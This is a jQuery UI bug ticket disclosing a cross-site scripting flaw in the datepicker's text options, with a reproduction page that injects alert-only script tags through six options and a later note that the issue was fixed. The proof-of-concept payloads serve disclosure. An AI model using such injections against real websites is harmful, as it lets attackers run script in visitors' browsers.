Search and Top Navigation
#15284 closed bug (fixed)
Opened March 23, 2018 03:11PM UTC
Closed May 25, 2021 08:58AM UTC
XSS Vulnerability on text options of jQuery UI datepicker
| Reported by: | andycyork | Owned by: | |
|---|---|---|---|
| Priority: | minor | Milestone: | none |
| Component: | ui.datepicker | Version: | 1.12.1 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
similar to https://github.com/jquery/api.jqueryui.com/issues/281 but applies to the datepicker\\\\
**to recreate**\\\\
Create a new HTML page.\\\\
Inject this content into new page:\\\\
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XSS in options of datepicker</title>
<script src="https://code.jquery.com/jquery-3.3.1.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<script>
$(document).ready(function () {
$( "#datepicker" ).datepicker({
showButtonPanel: true,
showOn: "both",
closeText: '<script>alert("closeText XSS")<\\/script>',
currentText: '<script>alert("currentText XSS")<\\/script>',
prevText: '<script>alert("prevText XSS")<\\/script>',
nextText: '<script>alert("nextText XSS")<\\/script>',
buttonText: '<script>alert("buttonText XSS")<\\/script>',
appendText: '<script>alert("appendText XSS")<\\/script>'
});
});
</script>
</head>
<body>
<p>Date: <input type="text" id="datepicker"></p>
</body>
</html>
\\\\
on load, alerts are shown for appendText & buttonText\\\\
after clicking the input control, alerts are shown for closeText, currentText, prevText & nextText\\\\
\\\\
The scripted alerts should not be shown - an attacker can take advantage of injecting malicious XSS content into website.
Attachments (0)
Change History (1)
Changed May 25, 2021 08:58AM UTC by comment:1
| resolution: | → fixed |
|---|---|
| status: | new → closed |
Fixed in https://github.com/jquery/jquery-ui/pull/1953